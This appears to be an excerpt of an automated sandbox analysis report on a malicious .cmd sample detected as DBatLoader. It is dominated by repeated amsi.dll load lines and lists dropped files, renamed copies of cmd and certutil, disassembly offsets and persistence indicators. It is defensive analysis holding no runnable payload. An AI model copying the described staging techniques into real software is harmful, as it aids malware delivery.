Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\Public\Libraries\Host.COM

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Drops PE files with a suspicious file extension

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 78326473_PDF.cmd

Static file information: File size 7182316 > 1048576

Source:	Binary string: easinvoker.pdb source: Host.COM, Host.COM, 0000000B.00000003.1338107962.000000007F940000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2574537137.0000000002116000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337612777.000000007FAF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1304240798.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1307940937.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1324967071.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1333637540.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1335863717.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1334980904.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1336518402.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1337946141.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1304240798.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1307940937.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1324967071.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1333637540.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1335863717.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1334980904.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1336518402.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1337946141.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source:	Binary string: easinvoker.pdbGCTL source: Host.COM, 0000000B.00000003.1338107962.000000007F940000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337851402.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575107446.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2574537137.0000000002116000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337612777.000000007FAF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match

File source: 11.2.Host.COM.2aa0000.2.unpack, type: UNPACKEDPE

Source: alpha.exe.3.dr

Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]

Source: C:\Users\Public\Libraries\Host.COM

Code function: 11_2_02AB8954 LoadLibraryW,GetProcAddress,FreeLibrary,

11_2_02AB8954

Source: alpha.exe.3.dr	Static PE information: section name: .didat
Source: kn.exe.5.dr	Static PE information: section name: .didat

Source: C:\Users\Public\kn.exe	Code function: 7_2_00007FF68AC63668 push rsp; ret	7_2_00007FF68AC63669
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ACD2FC push 02ACD367h; ret	11_2_02ACD35F
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AA63AE push 02AA640Bh; ret	11_2_02AA6403
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AA63B0 push 02AA640Bh; ret	11_2_02AA6403
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AA332C push eax; ret	11_2_02AA3368
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ACC374 push 02ACC56Ah; ret	11_2_02ACC562
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ACD0AC push 02ACD125h; ret	11_2_02ACD11D
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB3073 push 02AB30C1h; ret	11_2_02AB30B9
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB3074 push 02AB30C1h; ret	11_2_02AB30B9
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ACD1F8 push 02ACD288h; ret	11_2_02ACD280
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ABF104 push ecx; mov dword ptr [esp], edx	11_2_02ABF109
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ACD144 push 02ACD1ECh; ret	11_2_02ACD1E4
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AA678A push 02AA67CEh; ret	11_2_02AA67C6
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AA678C push 02AA67CEh; ret	11_2_02AA67C6
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AAD5A8 push 02AAD5D4h; ret	11_2_02AAD5CC
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ACC56C push 02ACC56Ah; ret	11_2_02ACC562
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AAC574 push ecx; mov dword ptr [esp], edx	11_2_02AAC579
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ABAADB push 02ABAB14h; ret	11_2_02ABAB0C
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02ABAADC push 02ABAB14h; ret	11_2_02ABAB0C
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB8AD2 push 02AB8B0Ch; ret	11_2_02AB8B04
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB8AD4 push 02AB8B0Ch; ret	11_2_02AB8B04
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AACA26 push 02AACD7Ah; ret	11_2_02AACD72
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AACBF4 push 02AACD7Ah; ret	11_2_02AACD72
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB8874 push 02AB88B6h; ret	11_2_02AB88AE
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02B14850 push eax; ret	11_2_02B14920
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB7914 push 02AB7991h; ret	11_2_02AB7989
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB694E push 02AB69FBh; ret	11_2_02AB69F3
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB6950 push 02AB69FBh; ret	11_2_02AB69F3
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB5E84 push ecx; mov dword ptr [esp], edx	11_2_02AB5E86
Source: C:\Users\Public\Libraries\Host.COM	Code function: 11_2_02AB2F68 push 02AB2FDEh; ret	11_2_02AB2FD6

Persistence and Installation Behavior

Source: C:\Users\Public\kn.exe

File created: C:\Users\Public\Libraries\Host.COM

Jump to dropped file

Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\Host.COM	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe			Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe			Jump to dropped file

Source: C:\Users\Public\Libraries\Host.COM

Code function: 11_2_02AA676A IsIconic,

11_2_02AA676A

Source: C:\Users\Public\Libraries\Host.COM

Code function: 11_2_02ABAB18 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

11_2_02ABAB18

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
